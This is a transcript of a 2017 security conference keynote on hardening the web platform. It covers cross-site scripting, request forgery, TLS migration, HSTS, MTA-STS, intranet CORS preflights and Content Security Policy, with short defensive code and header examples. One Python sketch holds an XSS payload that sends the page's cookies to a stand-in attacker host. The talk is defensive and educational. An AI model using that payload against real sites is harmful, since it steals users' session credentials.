
Keynote: Hardening The Web Platform

BSides Munich · 2017 · 1:06:20 · Published 2017-04
Style: Keynote
About this talk
Keynote: Hardening The Web Platform by Mike West at BSides Munich 2017
Transcript [en]

Hi, I'm Mike West. I work at Google on the Chrome team. I'm actually kind of curious, because I'm not at all familiar with the audience here: how many of you would consider yourselves web developers? Ten, maybe thirteen. How many of you would consider yourselves hardware hackers? How many of you would consider yourselves something completely different? Okay. Well, are you at least interested in the web? How many of you have ever seen a website? Good, we've got some common ground. I work on Chrome security, and what I'd like to talk to you about today is the way that we're approaching the web platform: the way that we're approaching the APIs that we give to developers, and the way the platform is designed in general. The platform has kind of organically grown over time. Some pieces of it make a whole lot of sense, and other pieces make no sense whatsoever, but they're legacy semantics that we're stuck with. When I talk about the platform, I'm really talking about the APIs that we give to developers, and the surface area that those APIs present not only to developers but also to attackers. I'd note, by the way, that the link for the slides is up and available right now. None of you have laptops, which is great,

but if you did have a laptop, I would suggest that following along would be helpful, just because there are a lot of links. This presentation is basically a brain dump of a variety of projects we're working on that I think are important, and if you're at all interested in developing things for the web, these are going to be APIs that are available to you in the near future, and I hope you start taking advantage of them. I consider myself a web developer at heart. I've kind of moved on from web development; I now work on Chrome itself. About five or six years ago I started on the Chrome team and started programming in C++, but before that I worked on the web, writing HTML, CSS, and JavaScript. The very first browser I ever used was this one. Does anyone know what this is? Yes, NCSA Mosaic. My parents got internet in a box, literally a box delivered to our house. It was great: we hooked up our modem, we dialed in, and we used Mosaic to get to various websites, and there weren't that many websites at that point; this was like '94, '95. For me it was absolutely transformative to see a View Source option, because I would browse around the web and I'd see all this

great information, and then I realized that not only was there information out there, but I could create it myself. Back then we were coding everything by hand, uphill both ways in the snow, so you could actually look at the source of a page and map it mentally pretty easily to what was rendered on the page. There was a one-to-one relationship, and it was really transformative for me to see that I myself could build these kinds of websites. About five years ago, when I started working on Chrome, I realized there was kind of another layer of view source, because all of that HTML, CSS, and JavaScript is actually rendered by C++, or Rust, or some other lower-level language, and building those browsers is a massive project. Chromium itself is hundreds of thousands of lines of code, and we have lots of dependencies that bring the number up significantly higher. It's a large project, and anyone who's ever worked on a large project will tell you that large projects are never finished; in fact, large projects are always broken in various ways. It continually surprises me that Chrome works at all, because we keep walking through these things: you look at some code and say, this code is crap, how could this ever have worked? And then you realize that you yourself wrote it three years ago, and

now you get to fix it. I've written a number of TODOs myself. I looked through the codebase last night: there are about 14,000 TODOs in the codebase, and another two or three thousand FIXME comments. So there are a lot of problems that we know about, and we knew about them while we were writing the code, because otherwise the comments wouldn't be there, right? And if you look at the bug tracker that we have, if you go to crbug.com, you'll see another several hundred thousand bugs that are open. So people are reporting bugs to us; it's not just the bugs that we knew about while we were writing the code. People are also telling us about things we didn't know about. The project itself is very large, and we're human, we're fallible, we're going to make mistakes. So there are bugs in the project that we know about, and bugs that we don't know about, and all of these together mean that the project itself is broken. But imagine a magic Chrome. Imagine that a team of elves came in overnight and fixed every bug in Chrome, so it was absolutely perfect. It would implement every standard perfectly, so every line of every standard is done, and the elves even wrote tests, so we won't cause regressions. So we have a

well-tested, perfect implementation of every standard out there for the web. My contention is that it would still be broken, and it would be broken not because the code didn't do what we expected it to, but because the implications of those expectations are actually different than what we thought they were when we were designing things in the first place. The platform itself has issues, and those issues are baked into the design of the platform. This is especially true for really old things: if you look at the original HTML spec, and the original JavaScript implementation for Netscape, there are issues of design that make it difficult for us to really lock things down. Now, there are some things where we made really good decisions way back when. Take the same-origin policy for websites, which means that, you know, example.com cannot access bank.com's resources. That wasn't a given: way back in the day there were actual questions about whether it should be possible for you to load data from anywhere, and to make requests anywhere, and to just treat everything as one big homogeneous pool of data. That makes a lot of sense when the web is used for science and literature; it makes significantly less sense when it's used for banking applications. So we made some good decisions way back when, but we also made some bad decisions, and what I'd like to talk about is the way that

the Chrome team is approaching this situation: looking backwards to try to fix old APIs, but also looking forwards to design new APIs in ways that actually make sense. With regard to the web platform, the Chrome team, well, I am, really concerned with two main classes of attacks. I assume that the browser is perfect; I assume that the elves came in at some point and fixed all of the implementation bugs. What I am trying to do, and my team is trying to do, is actually build on top of that quasi-perfect system, and leave the imperfections to the rest of the security team, who are worried about finding all those bugs and fixing them. From my perspective, the browser itself, by design, is a confused deputy. This describes a class of attack that uses the browser's privileged position as your agent on the web; that's why we call it a user agent. The browser is you, represented to the web. The browser makes requests on your behalf, the browser stores data on your behalf, the browser shares data on your behalf, and it can very easily be tricked into doing things that neither the server nor the client actually wants it to do. So there are two broad classes of attacks that I really want to fix and that

I think are really important. The first is called cross-site scripting. Who's heard of cross-site scripting? Everyone. And you said only a handful of you were web developers; what's going on? Cross-site scripting is, as you all know, a mechanism of tricking a server into delivering code that the server doesn't actually expect to be delivering. I talked about the same-origin policy earlier, and as you probably know, any code that executes in the context of an origin has all the power of that origin. So if I can trick a server into delivering JavaScript, then the server will send that JavaScript down to the client, and Chrome will execute it. If you know anything about V8 in Chrome, you know that V8 loads JavaScript and wants to execute it absolutely as quickly as possible. This is a great thing when the code is actually what you intended; it's kind of a terrible thing if the code isn't what you actually wanted to run. So cross-site scripting is a big problem. Almost every website is going to have an injection attack of one sort or another. Google has been bitten by these attacks, even though we have an internal security team whose entire job is dedicated to preventing these kinds of attacks, and it's quite possible that the sites you're responsible for, or the sites that teams at your companies are responsible for, have similar kinds of holes.
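The core of the defense against this kind of injection is contextual output encoding. As a minimal sketch, in Python rather than a real templating system, and with a hypothetical `comment` value standing in for attacker-controlled input:

```python
import html

# Attacker-controlled input, e.g. a comment submitted to the server.
comment = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Interpolating raw input into markup hands the attacker script execution
# in the origin of the vulnerable page:
unsafe = "<p>" + comment + "</p>"

# Escaping HTML metacharacters turns the payload into inert text:
safe = "<p>" + html.escape(comment) + "</p>"
print(safe)
```

Real templating systems, the kind Google invests in internally, apply this escaping automatically and per output context, which is why they matter so much for the numbers below.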

If you look at the vulnerability reward program at Google, where we pay researchers to tell us about bugs instead of exploiting them, we see that cross-site scripting is easily the largest category we have, again, even though we invest a ton in templating systems, and even though we invest a ton in education internally. The second kind of attack that I think is pretty interesting is called cross-site request forgery. Again, the browser doesn't really understand what's going on; Chrome, Firefox, whoever, is going to make requests on your behalf, and when it makes those requests, it's going to make them with your authority, with you as the user initiating the request, or at least that's what it looks like to the server. So if evil.com makes a request to bank.com, it's going to send your cookies along with it, and channel-bound tokens, and the channel ID, and whatever else. All of the authentication information is being sent along with these requests. So if the server is not defending itself against this kind of attack, it's quite possible for evil.com to change state on bank.com, perhaps by transferring all of your money to evil.com. This ends up being bad in a variety of ways, and it's something that I think we need to address in one way or another; I'll talk a little bit about the strategies. Do you know Mario Heiderich? Mario does great work; he's incredibly smart.
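One classic application-level strategy against request forgery is worth sketching: a token tied to the user's session that evil.com can neither read nor guess, so a forged request arrives with valid cookies but an invalid token. A minimal sketch in Python; the names `csrf_token` and `is_valid` are illustrative, not any particular framework's API:

```python
import hashlib
import hmac
import secrets

# Server-side secret (hypothetical setup; real apps persist this securely).
SECRET_KEY = secrets.token_bytes(32)

def csrf_token(session_id: str) -> str:
    # Derive a token bound to the user's session.
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def is_valid(session_id: str, submitted: str) -> bool:
    # Constant-time comparison. A cross-site form submission carries the
    # victim's cookies automatically, but the attacker cannot read the
    # token embedded in the victim's page, so this check fails.
    return hmac.compare_digest(csrf_token(session_id), submitted)

token = csrf_token("session-abc")
```

The token is embedded in each form the server renders and checked on every state-changing request; SameSite cookies attack the same problem from the browser side.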

Last year he suggested that web security has become a paradox: that web apps which are both complex and secure cannot be built, that the web stack has grown beyond that being possible. And he's happy about that, I think, because he's a pentester; he really wants these holes to continue to exist so that he can keep hacking into websites and educating developers. But I find this sentiment somewhat nihilistic, and I think it's unfortunate when we look at the platform and say, well, the platform is large and it's powerful, therefore it's indefensible. I think instead what we should do is actually examine the platform and figure out what changes we can reasonably make. So the Chrome team, at least the web platform side of the Chrome team, is really interested in measuring the usage of various things on the web. We have a metrics system internally where, if a user opts into sharing usage data, we can figure out how often certain APIs are used. These are not really complicated counters; it's really just: if a thing happens, increment something. Then we look at those counters and say, well, this happens on some percentage of page views. Using this kind of information, we can look at the old APIs that we don't like, look at the way those APIs are actually used, and try to figure out what changes

we can reasonably make in order to make those APIs better. Like everything else at Google, we try to be data-driven, and we try to understand the impact on users, but that doesn't mean the platform is immutable. So we definitely want to look back at these old APIs and figure out what kinds of changes we can really make. At the same time, we want to look forward, and we want to give developers good APIs. Something we talk about internally on the Chrome team a lot is the idea of giving developers sharp tools. If you've ever cooked or cut anything with a knife, you'll recognize that a sharp knife is significantly easier to use, and therefore significantly safer, than a dull knife. If you have a really sharp knife, it'll cut right through things; you don't have to exert much pressure, which means you have a great degree of control over where the blade is going. If you have a dull knife, you can't really cut anything unless you exert a lot of pressure, and when you exert a lot of pressure, you lose control over where the knife is going. So if you're cutting some food, it's quite likely that if you have to press really hard, the knife will slip and you'll end up cutting yourself. We want to give developers sharp tools, because we see, when we don't

give them sharp tools, that we end up with things like Flash. If we don't give developers the tools in the platform, they will route around the platform in whatever ways they can; they will see the platform as damaged, and they'll route around it. So you get things like Flash, which end up causing significantly more problems, over a longer period of time, than a well-designed API that actually gave developers the power to do the things they wanted to do in the first place. So the Chrome team is really interested in giving people sharp tools, and if you look at sharp tools, you recognize a couple of things that I think are really good metaphors for security on the web. You'll see that the tool has a sharp piece and a not-so-sharp piece; that much is relatively obvious. In between those two pieces, however, you'll see a little brass bar: that's the guard. The guard serves a couple of important purposes. First, it stops your hand from sliding down the knife and cutting itself on the sharp blade. It gives you a context in which you can actually use the tool; it makes the tool easier to use, and it gives you some guidance as to how to hold it right: you hold the hilt, you don't hold the blade. Second, it stops sharp objects from sliding down the blade to cut your hand. Now, I'm

not the knife-fighting type, but if you are knife fighting, then you want a knife that has a guard, because it will actually stop your opponent's knife from sliding down your blade and cutting your hand. So it protects you from attack, and the interesting thing about this is that it's not an opt-in protection; it's structural, it's built into the tool itself. You are protected in some way from attackers just by having this tool, because the tool is designed in such a way as to protect you. The second thing you'll notice is that knives and swords and other bladed instruments usually have a sheath or a scabbard or some mechanism by which you can put the knife away and make it blunt. If you have kids at home, you probably don't want to leave a sharp knife lying around; you want to put it away into a knife block or a sheath or a scabbard or something, and that actually blunts the knife, because the outside of the sheath is not going to cut anybody. You can hit them on the head with it, but you're not going to cut them, and you're not dulling the edge of a sharp blade that you know you're going to use. This is a really good metaphor for the kinds of opt-in protections that we can give to developers, by providing them with APIs that allow them to lock their

sites down more securely than we can do by default. We have all these APIs, people are relying on them, and we can't just change the web out from under them. But we can give you the ability to change your own application, to make it different than the rest of the web, and actually more secure, by simply turning off things that you know you're not going to use. You can reduce the surface area for attack simply by putting various APIs into sheaths. So let's start with this idea of a guard. What are the structural changes that we can make to the web to make it better, to make the APIs on the platform that we provide to developers more sensible? The very first thing we need to do is improve TLS; that's absolutely critical. This structural change is something that's been ongoing over time, and the Chrome team has been very persistent about getting folks to start using encryption, to start using HTTPS as opposed to HTTP. I think Firefox has published telemetry showing that they've finally gone over the fifty percent mark, so Firefox users now see more TLS than non-TLS, at least in terms of the time they're browsing. I think Chrome has similar numbers, published in Google's HTTPS transparency report. If you haven't seen that, I think it's pretty interesting: it shows you how much of Google's traffic

is encrypted, a large majority of incoming traffic at the moment, and it also gives you an overview of where websites are: which large websites have transitioned over, and whether they have good TLS configurations. There's a really great website in the States called Secure the News, which goes through a lot of news websites and will tell you whether or not they're using HTTPS. Now, news websites in the States are not great; there are a lot of these websites that aren't using TLS, though some large websites have just made the jump. The New York Times, for instance, just transitioned over, I think last month, which is great and really exciting. News sites in Germany are not quite in the game, or at least I haven't seen them be that way. The big German news sites are mostly not available over TLS, and in fact some of them will actually redirect you to HTTP if you go to HTTPS; others will not even load the page at all. If you go to https://www.bild.de, it will give you a 410 error that says this page is not available. Another one loads the page over HTTPS but doesn't give you any data; it just gives you an

error. Regardless, news sites and these kinds of non-login sites are things that some people think don't really need TLS, because, you know, why would you care? But TLS gives you a number of important benefits. It gives you a modicum of integrity: you know that the bits being delivered over the wire are actually intact when they get to you, and haven't been modified by someone in between. So folks aren't injecting ads into your websites, and they're not changing your website; you know that if there's an article on sueddeutsche.de, it is actually Süddeutsche writing it, and not Vodafone injecting an article that's really positive about Vodafone. So you get integrity. You also get authentication: you know that the server you're talking to is the server that's justifiably using that name, not an imposter; it's actually who it's supposed to be. And it gives you a measure of confidentiality: no one knows what articles you're reading, so if you're really interested in the new Power Rangers movie, no one's going to judge you for it, because no one knows. Probably a good movie, I don't know. One of the things that's changed recently is the introduction of Let's Encrypt. Has anyone heard of Let's Encrypt? Excellent, wonderful. Let's Encrypt is really exciting because it is a certificate authority

that has significantly better properties than a lot of certificate authorities have had in the past. A lot of people have really focused on the free aspect of Let's Encrypt: it gives you a certificate, and you don't have to pay for it. That's great, because it really opens the doors to a lot of people who weren't going to pay for certs but should be using certs. But I think the more important change is not "free" but "automated": there's a protocol called ACME which allows you to obtain a certificate for a server without manually going through the process of going out, grabbing a cert, installing it on your server, and then setting up your server so that it's actually using the cert to deliver an encrypted connection. The automation portion of this is incredibly important, for a couple of reasons. In the status quo, you'll generally go to a CA and buy a cert; it'll be good for about three years, and after three years and one day you'll run a fire drill, because no one at the company has any idea how to deploy a cert. The last time you did it was three years ago, and the three people responsible for it have all left the company, or they don't remember. Right? No one documents these things. So there's a fire drill, and when your cert has expired you

need to go out and figure out how to do all this stuff, and it just never works out the way it's supposed to. Let's Encrypt, I think, by default, I think right now, only gives you a cert for 90 days, and I think the goal is to reduce that, so that it's not three years but 60 days, or 30 days, or three days. These kinds of short-lived certificates, I would really love to see them become the norm, for a variety of reasons. First of all, because issuance is automated, and because there's this protocol behind it and a program running on your server, renewal is going to be something that you do on a regular basis; it's going to become part of your normal deployment process, as opposed to a one-off thing that you do three times a decade. It also gives us the opportunity to change the certificate ecosystem more rapidly than we've been able to in the past. If you've followed along with the CA news over the last two years, you've heard a lot about SHA-1, and you've heard a lot about Chrome, at least, trying to deprecate SHA-1 as a signature algorithm for certificates, because it's not good enough these days. It has taken an incredibly long time to get SHA-1 deprecated.
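Once renewal is routine, checking how close a certificate is to expiry is just another automated job. A small sketch of that check in Python, assuming the `notAfter` string in the format that OpenSSL (and Python's `ssl.getpeercert()`) reports; the 30-day window is an illustrative choice, not a standard:

```python
from datetime import datetime

def days_until_expiry(not_after: str, now: datetime) -> int:
    # notAfter as reported by ssl.getpeercert(), e.g. "Jan  1 12:00:00 2030 GMT"
    expires = datetime.strptime(not_after, "%b %d %H:%M:%S %Y %Z")
    return (expires - now).days

def needs_renewal(not_after: str, now: datetime, window_days: int = 30) -> bool:
    # With 90-day certificates, renewing inside a ~30-day window leaves a
    # comfortable cushion; a daily cron job can simply run this check and
    # trigger the ACME client when it returns True.
    return days_until_expiry(not_after, now) <= window_days
```

This is exactly the kind of logic that ACME clients run for you; the point is that it happens continuously, not once every three years.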

That was partially due to reticence on the part of CAs to make any changes whatsoever, but it's also due to the fact that if you sell a certificate that's good for three years, we have to support it for three years, because otherwise we're making people sad. So by reducing the longest amount of time you can have a certificate for, we're actually making it possible to change the ecosystem more rapidly. Shorter-lived certificates, along with automation, are absolutely going to improve the ecosystem. That said, deploying a certificate is still more difficult than it ought to be. There are a couple of servers coming out these days that actually build TLS into the core infrastructure of the server; Caddy is one of them. Caddy is incredibly simple to set up: all you have to do is point a DNS name at it, and it will get a cert on your behalf, it will renew the cert on your behalf, and it continually updates the configuration of the server, so you don't have to care about things like cipher suites or algorithms or anything. All you have to do is deploy Caddy, and then, like magic, your TLS setup will just keep iterating and getting better over time. WIRED is a magazine in the States that has migrated over to TLS, and what they did, which I think is really nice, is put together a series of articles talking about the way they did the migration and the problems they ran into over time. This was incredibly useful to us as browser vendors, and as API designers, to figure out where the holes were and where people were running into pain. These are really good articles if you're at all interested in migrating your sites over to TLS. Is anyone willing to admit that their company does not serve their website over TLS? Okay. Those folks, I would really recommend that you take a look at these articles, and the rest of you, who didn't want to admit that your site isn't fully TLS, you should all take a look at these articles too.
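To give a sense of how little configuration the Caddy setup mentioned a moment ago actually needs: a minimal Caddyfile for a static site, in the 1.x syntax current at the time of this talk, with the hostname and path as placeholders. Pointing DNS at the machine is enough for Caddy to obtain and renew the certificate itself:

```
example.com {
    root /var/www/example
}
```

Everything TLS-related (issuance via ACME, renewal, cipher configuration) is handled by the server, not by the operator.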

They really go through a lot of the struggles that large companies will face when doing this exact migration. I migrated mikewest.org over to TLS years ago, and it took like an hour; it was relatively straightforward, and I knew all the content. These larger sites take significantly longer, and I think what's interesting about them is that they run into very different problems than you see on small sites. One of those problems is mixed content. Mixed content is basically about a guarantee that we give to users: we say, if you see TLS, if you see an encrypted connection, we want to verify to you that everything on this page is encrypted, because otherwise we're lying to you when we tell you it's secure. So we block things like script loaded over HTTP on an HTTPS page, because there's no integrity for that script; it could be anyone delivering script to that page. And this is something that certainly WIRED saw, and other folks have seen, as a real blocker to this kind of migration. There are large news organizations that have run websites for long enough that they have lost the previous CMSes that they used to deploy content to the website. So they have a database, the database is full of stuff, but they have

no program that actually interacts with it; it's just sitting there, serving stuff on their website, and for various reasons they're reticent to actually go through those database entries and modify them, because, you know, they might break things, and they don't have any way of recovering from that breakage. So we've talked a little bit with these folks and tried to design APIs for them that enable them to continue serving their websites, but to do it in a secure way. One of those is called upgrade-insecure-requests. We know that you spelled HTTPS as HTTP on your website: you wrote http://example.com, but you really meant HTTPS. So you can instruct the browser to make this transition for you, and we will automatically upgrade the requests before we send them out on the wire, so they're never treated as mixed content. If you have an image on your page that's linking to an http:// URL, and you set upgrade-insecure-requests, then we will automatically upgrade that request and ensure that you never have mixed content on your website, because we're always upgrading the requests. What's interesting about this is that it also cascades down into frames, so if you load various content on your website, we can guarantee that we're never actually going to degrade the UI that we display to users; we're always going to be loading content over an encrypted channel. This looks like an upgrade-insecure-requests directive in the Content-Security-Policy header, which we'll talk a little more about later. The idea is that you deliver this HTTP header along with the page, and you say: I know that I spelled things HTTP on this page, but please, browser, help me out here. And we'll do that. upgrade-insecure-requests is available in basically every major browser today except Edge; Edge is working on it, but they're not quite there yet. It just shipped in iOS 10.3, which came out last week, I think, so Safari 10.3 on iOS and 10.1 on Mac. It's been in Chrome for a long time, and it's been in Firefox for a long time.
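Concretely, the opt-in is a single CSP directive, sent as a response header:

```
Content-Security-Policy: upgrade-insecure-requests
```

or, where you can't touch server configuration, delivered in the page itself via a meta tag:

```
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
```

Either form tells the browser to rewrite the scheme of same-page subresource (and same-origin navigation) requests from http:// to https:// before they hit the network.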

That also means it's in Opera, which gives you pretty good coverage with regard to upgrade-insecure-requests. And if you look at the WIRED articles, you'll see that they found this to be an absolutely critical portion of their upgrade process: allowing them to upgrade things without actually changing things on disk was incredibly valuable to them. Now, the inverse of this: you'll recognize that upgrade-insecure-requests is basically the site asserting to the browser that its third-party resources should actually be loaded over HTTPS. The inverse would be those third parties asserting that they should always be loaded over HTTPS, even if you spelled them as HTTP. A good example of this would be youtube.com. youtube.com has been around long enough that it wasn't always delivered over HTTPS. It is delivered over HTTPS now, and it's serving an HSTS header, which means that the browser will never connect to it over HTTP; we'll do a client-side redirect before actually going out to the web, which means you'll never make a non-secure connection to youtube.com. However, there are tons of youtube.com frames on the web, and those frames are all http://youtube.com, because that's what they were when the person originally copied and pasted them.
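The assertion YouTube is making is the HTTP Strict Transport Security header. A site that is confident in its HTTPS deployment sends something along these lines, where max-age is one year in seconds, and the includeSubDomains and preload flags are optional strengthening steps:

```
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
```

Once a browser has seen this header over a valid HTTPS connection, it rewrites future http:// navigations to that host to https:// internally, before any request leaves the machine.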

No one is going to go through and change a billion frames across the web. It would be nice if we used HSTS in order to upgrade those requests, to unblock those websites from upgrading to TLS without forcing them to go through all their code and make changes. Unfortunately, this introduces a little bit of non-determinism, because you, as a developer, have been to every resource that you require: you've been to your CDN, you have the HSTS pin for that website, so you know that you're always going to load it over HTTPS. But your users have never been to your CDN, and never will go to your CDN, which means they will see breakage, they will file bugs, you will close the bugs because it works for you, and then everyone will be sad when you actually figure out what's going on. What we'd like to do is reverse the order of HSTS and mixed content, so that HSTS happens first and does the upgrade, but does it in such a way as to not introduce this non-deterministic behavior. One approach to this, which Firefox has implemented and is in the process of shipping, or at least is experimenting with, is something called HSTS priming. The idea is that if we're going to load a non-secure resource, we will first make an HTTPS request to that origin and say, hey, do you have HSTS? And if you do, great: we'll store that pin, and then we'll upgrade the request. This makes it a deterministic process; we will always get the pin if there is a pin to be gotten, and because of that we should be able to invert these checks and allow those third parties to actually assert something about their own resources, which I think would be pretty great. I would note, however, that this isn't just for websites; it's actually important to encrypt other communications too, like email. STARTTLS has been around for a long time, and it is an opportunistic encryption mechanism where a server that wants to send an email

will ask permission to send some email from an SMTP server and it will along with that you'll say hey I can totally encrypt this if you wanted me to if you get the right response back then the transmission will be upgraded to an encrypted pls connection and then you'll send the email over an encrypted connection which is great because that means people can read your email or at least no one but those two parties can agree unfortunately because it's opportunistic is trivially blocked so an active network attacker only has to block a single header in the response and that's just trivia it happens all the time because people want to be able to read email any virus does it's a lot

where it says: oh, I can't read TLS, so I'll just strip that STARTTLS stuff so that I can parse all these messages before they get to the server. So it's a thing. MTA-STS is basically applying the notion of HSTS to email: you have a DNS entry, and you have a file sitting on your server somewhere, that expresses a policy about your email server. By doing so, you can assert in an out-of-band way that senders should always have a TLS connection to you when delivering mail. This gives you properties similar to HSTS on the web. If you have an email server, I really recommend that you set one up.
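As a sketch of what that looks like (MTA-STS was still an IETF draft at the time of this talk; the shapes below follow the draft that later became RFC 8461, with example.com standing in for a real domain), you publish a TXT record announcing a policy, and serve the policy itself over HTTPS at a well-known path:

```text
; DNS TXT record announcing that a policy exists
_mta-sts.example.com.  IN TXT  "v=STSv1; id=20170401T000000Z"

# Served at https://mta-sts.example.com/.well-known/mta-sts.txt
version: STSv1
mode: enforce
mx: mail.example.com
max_age: 604800
```

A sending server fetches and caches the policy, and thereafter refuses to deliver to example.com without a valid TLS connection to one of the listed MX hosts.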

Encrypted email, and encrypted communication generally, is incredibly important. I'd also note, again looking back at old APIs, that we have launched a lot of APIs that, in retrospect, we kind of wish we hadn't launched in that way. In particular, there are a lot of APIs that are available over non-secure connections that should never have been available over non-secure connections. Geolocation is the canonical example: it shouldn't be the case that by granting an origin access to your location, you're giving everyone on the network between you and that origin your location. Because it is a non-secure origin, there is no

authenticity, which means I can forge that content to my heart's content; I can grab your location just by being an active network attacker. That's kind of unfortunate. What we're trying to do now, looking forward, is only launch new powerful APIs in secure contexts, so they're locked to TLS: you can have geolocation over HTTPS, but you can't have geolocation over HTTP. There are a variety of APIs doing so. Geolocation is the canonical example, but also Web Crypto, getUserMedia (so your camera and your microphone), the Credential Management API, service workers, Payment Request, and many, many more. The idea is that these kinds of APIs, especially the ones that have permissions associated with them,

are only meaningfully granted permission in a context you can assert something about, and you can't assert anything about HTTP, so giving access to these APIs over HTTP is simply a bad idea. Again, looking at the data that we have, we've been able to deprecate a number of these APIs over HTTP: geolocation was turned off over HTTP early last year, so you can only access geolocation over HTTPS. My hope is that we'll become more aggressive with others. I would like to live in a world where we only launch new APIs over HTTPS. That's been a difficult sell both internally and externally, but I

think that browser vendors in general are starting to get on board with the idea that shipping new APIs over HTTP is simply a bad idea. The last structural change I'll comment on is the distinction between intranet and Internet. Again, your browser is in a privileged position and is acting on your behalf with your credentials, and one of your credentials is actually the network that you're connected to. If you happen to be in an office, connected to its network, you have access to different kinds of resources than I would have from outside that office, because you're on a trusted internal network, you're running on a trusted machine, and you're able to

make requests to things like your printer or your router, but I wouldn't be able to make those requests, at least on that port, from outside. Because of this, it's become relatively common, unfortunately common, to see attacks on people's routers, because routers are generally at known locations: 192.168.1.1 is probably going to be a router, and if not, it's going to be 10.0.0.1 or something along those lines. Because of that, and because of the fact that routers were never actually expected to be attacked from the web, and are written in a way that makes CSRF-style attacks trivial in a number of cases, it's quite

possible for an attacker to force your computer to make a request to your router that then changes your DNS server, so that you're using the attacker's DNS server, and at that point your web is very different from the web that actually exists. Because of this, we'd like to make it more difficult for attackers to use the privileged position of your browser to attack things that the web doesn't normally have access to. This includes your local intranet, but it also includes things running on localhost, on the loopback address. If you install some software locally, then it's quite possible that that software sets up a server and then serves responses to requests from particular origins.

Dropbox does this, Spotify does this, Google has some products that do it; it's relatively common to try to give a website a little bit more access this way. Dropbox, for instance, wants to know whether the Dropbox client is installed, so that it can give you a link that goes to your local copies, and they do this by having a server running locally that accepts requests from dropbox.com. Dropbox is clever enough that they do reasonable CORS checks on this information, so they verify that it's actually coming from dropbox.com and not from anyone else on the web. Trend Micro was not doing those kinds of checks, and because of that actually had a remote

code execution on your computer just by sending an HTTP request to localhost, which is kind of not awesome. It would be great if that weren't a thing. What I would like to do is split the web into three layers; at least, these three layers make sense to me. You have the web, the outside stuff; then you have the intranet, and there's an RFC, RFC 1918, along with a couple of updates, that defines a set of IPs that are reserved for internal use. This is completely different in IPv6, and I have no idea what we're going to do there, but at least for IPv4 we should be able to make something work,

and then you have localhost. You can think of this as an onion, where the privileges expand as you go further in. You want to lock down access to localhost, and you want to lock down access to the intranet, and we can do this by extending the notion of CORS. CORS is cross-origin resource sharing, and it's basically a system by which origin one can ask permission to make certain requests of origin two; generally we only do this for non-simple requests, in CORS terms. What I'd like to do is extend that to actually force a CORS preflight for any request that crosses one of these boundaries. So if you're going from the

web to localhost, the browser will first send an OPTIONS request to localhost to ask: okay, do you understand the CORS protocol? Do you understand that you're going to get a request from someone outside of your network, and are you okay with that? If the software is written in such a way that it accepts that request and sends a reasonable response back, then we'll allow the request. If the software doesn't respond, because it doesn't understand OPTIONS or doesn't understand this protocol, we'll lock it down, and we'll make sure that the web is incapable of talking to things like old routers that are never going to be updated. I think that's pretty interesting.
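A hedged sketch of what such an exchange might look like, based on the CORS-RFC1918 proposal as drafted around this time (the header names were still in flux, and the hosts are illustrative):

```http
OPTIONS /set-dns HTTP/1.1
Host: 192.168.1.1
Origin: https://public.example
Access-Control-Request-Method: POST
Access-Control-Request-External: true

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://public.example
Access-Control-Allow-Methods: POST
Access-Control-Allow-External: true
```

A router that never answers the preflight, or answers without the opt-in header, would simply never see the actual request.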

It turns out to be really difficult to implement, though, because figuring out what IP address you're going to be talking to is actually painful, especially in a mixed IPv4 and IPv6 world. There's a wonderfully named algorithm called Happy Eyeballs: the idea is that you race an IPv4 connection against an IPv6 connection, and whichever responds first is the one you're actually going to talk to. That happens way down deep in the network stack, and it's really difficult to get to the point where I know which connection I'm going to use at the point where I can actually make this kind of preflight decision. So I have about half an implementation of

this in Blink, and it turns out I'm going to have to do a little more work. Anyway, let's move on from these structural changes to opt-in changes that developers building websites can use to make their own sites more secure. The first and foremost of these is Content Security Policy. Content Security Policy is a policy mechanism that allows you to determine what resources load on your page. The basic idea is that you have resources of various types, and you say: okay, script can load from these origins, it can load from my CDN, it can load from me myself, but it can't load from evil.com.
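Concretely, such a list-based policy is delivered as a header; a minimal example (hostnames illustrative):

```http
Content-Security-Policy: script-src 'self' https://cdn.example.com; object-src 'none'
```

With this in place, the browser refuses to execute script from any origin other than the page's own and the listed CDN.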

This gives you the ability to lock down your site to prevent cross-site scripting attacks, or at least to mitigate the risks associated with cross-site scripting. Content Security Policy has been around for a number of years now, and we're just now getting to the point where it's useful. GitHub has done a great job with their Content Security Policy: they've put a ton of work into locking down the origins they load resources from, and they have probably the best list-based security policy I've seen, where they actually know every server they're loading things from and can verify that they're only loading their own code from those servers. Google.com, however, has had

a much more difficult time deploying one of these list-based policies, because as it turns out there's a lot of stuff on google.com. If you're at all familiar with return-oriented programming: if you have these gadgets in your code, you can run pretty much any code just by stringing gadgets together in various ways. The same thing is true on an origin like google.com; there's enough code on google.com that you can find something to load that will do the work you wanted to do. So it's totally possible to bypass a Content Security Policy that's based on whitelisting on something like google.com. Both GitHub and Dropbox have been using CSP,

using it for quite some time, and they've put together really good descriptions of how they arrived at their current policies, the challenges they ran into over time, and the things they learned during deployment. I think it's really worth your time to take a look at both of these if you're responsible for a website at all and you want to defend it against attacks like cross-site scripting. However, these kinds of policies can start getting a bit absurd. This is Twitter's policy; Facebook's policy is even longer. You start running out of space on a slide to display all the origins you're loading things from. It

turns out, as I mentioned earlier, that deploying a policy like this on a site like google.com isn't as simple as it seems. Happily, however, Content Security Policy Level 2, which is supported in basically all major browsers at this point, has a mechanism called nonces that allows you to whitelist a specific script not by origin but by saying: I meant for this script to be on my page. You have a token that you send in a header, and that token is then reflected in your page as part of the script tag. If the two things match, and you're doing a good job of rotating the tokens, generating a new token every time (a

nonce is a number used once), then you can actually verify that this script is the script that you wanted to run, because an attacker trying to inject script into your page doesn't know that token and is therefore not able to execute script. The smart folks on the Google security team have put together a set of guidelines for what they're calling a strict CSP, asserted with nonces. The idea is that you use these nonces instead of a whitelist to allow specific script elements on your page, and you then grant those script elements the authority to load more scripts. There's something called 'strict-dynamic' in CSP3 that allows you to

give power to the scripts that you load, to load more scripts. This is pretty interesting, because it gives you a loader mechanism: you verify the loader script, and then you say, well, my loader script can load stuff, so let it load things. This turns out to be a really good way of deploying CSP, and it makes it much less fragile than these origin-based lists, because if you're loading Maps, for instance, Maps is going to load whatever Maps wants to load. You don't have to know all the servers Maps is going to use; you just say: Maps, please do your thing.
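A strict nonce-based policy along the lines described looks something like this (the nonce shown is a placeholder; a real one must be freshly generated for every response):

```http
Content-Security-Policy: script-src 'nonce-Rand0mBase64Value' 'strict-dynamic'; object-src 'none'; base-uri 'none'
```

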